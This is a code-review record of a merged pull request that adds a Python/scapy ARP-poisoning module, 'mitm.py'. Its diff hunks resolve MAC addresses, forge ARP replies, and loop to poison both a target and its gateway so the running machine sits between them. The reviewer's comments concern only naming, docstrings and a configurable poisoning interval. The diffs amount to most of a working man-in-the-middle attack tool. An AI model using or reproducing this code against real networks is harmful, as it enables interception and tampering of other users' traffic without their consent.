### PR TITLE
Feature/arp poison

### PR DESCRIPTION
**Pull request by benjaminbaker-dev**

### CODE REVIEW

File: arp_poison/mitm.py [hunk 1]
```diff
@@ -0,0 +1,45 @@
...
+
+def _spoof_arp_cache(target_ip, target_mac, source_ip):
+    """
+    function sets the targets arp cache so that :param source_ip resolves to this machine's MAC
+    """
+    spoofed = ARP(op=ARP_REPLY, pdst=target_ip, psrc=source_ip, hwdst=target_mac)
+    send(spoofed, verbose=False)
+
+
+def run(target_ip, gateway_ip):
```
Comment (jfeiglin) [inline arp_poison/mitm.py]: bad name

Comment (benjaminbaker-dev) [reply arp_poison/mitm.py]: run_mitm ?

File: arp_poison/mitm.py [hunk 2]
```diff
@@ -0,0 +1,45 @@
...
+ARP_REPLY = 2
+ARP_REQUEST_TIMEOUT = 5  # seconds
+BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
+
+logging.getLogger(scapy.__name__).setLevel(logging.WARNING)
+logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
+logger = logging.getLogger()
+
+
+def _get_mac(target_ip):
```
Comment (jfeiglin) [inline arp_poison/mitm.py:16]: add docstr to each function (parameters, description). pycharm should suggest the format automatically

Comment (benjaminbaker-dev) [reply arp_poison/mitm.py:16]: kk - thought _get_mac was self explanatory

File: arp_poison/mitm.py [hunk 3]
```diff
@@ -0,0 +1,45 @@
...
+def run(target_ip, gateway_ip):
+    """
+    inserts this machine between target and gateway
+    """
+    target_mac = _get_mac(target_ip)
+    gateway_mac = _get_mac(gateway_ip)
+
+    logger.info("starting spoof")
+
+    while True:
```
Comment (jfeiglin) [inline arp_poison/mitm.py:56]: this is an incredible amount of spam, you are sending packets non stop. add a configurable sleep with a default value

File: arp_poison/mitm.py [hunk 4]
```diff
@@ -0,0 +1,45 @@
...
+        logger.info("sending who-has for {}".format(target_ip))
+        arp_request = Ether(dst=BROADCAST_MAC) / ARP(op=ARP_REQUEST, pdst=target_ip)
+        arp_response = srp(arp_request, timeout=ARP_REQUEST_TIMEOUT, verbose=False)[0]
+
+    target_mac = arp_response[0][0][1].hwsrc
+    logger.info("got mac: {}".format(target_mac))
+    return target_mac
+
+
+def _spoof_arp_cache(target_ip, target_mac, source_ip):
```
Comment (jfeiglin) [inline arp_poison/mitm.py]: probably should be called poison_arp_cache or something (thats the technical name for this)

**Review by jfeiglin — CHANGES_REQUESTED** [review]
make the requested changes in the comments

File: arp_poison/mitm.py [hunk 5]
```diff
@@ -0,0 +1,58 @@
...
+ARP_REQUEST_TIMEOUT = 5  # seconds
+BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
+POISON_INTERVAL = 5  # seconds
+
+logging.getLogger(scapy.__name__).setLevel(logging.WARNING)
+logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
+logger = logging.getLogger()
+
+
+def _get_mac(target_ip):
```
Comment (jfeiglin) [inline arp_poison/mitm.py:16]: docstrings start with a line or two explaining the function

File: arp_poison/mitm.py [hunk 6]
```diff
@@ -0,0 +1,58 @@
...
+    """
+    target_mac = _get_mac(target_ip)
+    gateway_mac = _get_mac(gateway_ip)
+
+    logger.info("starting spoof")
+
+    while True:
+        _poison_arp_cache(target_ip, target_mac, gateway_ip)
+        _poison_arp_cache(gateway_ip, gateway_mac, target_ip)
+        sleep(POISON_INTERVAL)
```
Comment (jfeiglin) [inline arp_poison/mitm.py]: make it configurable as a parameter

**Review by jfeiglin — CHANGES_REQUESTED** [review]
changes in comments

**Review by jfeiglin — APPROVED** [review]
approved

**Pull request merged**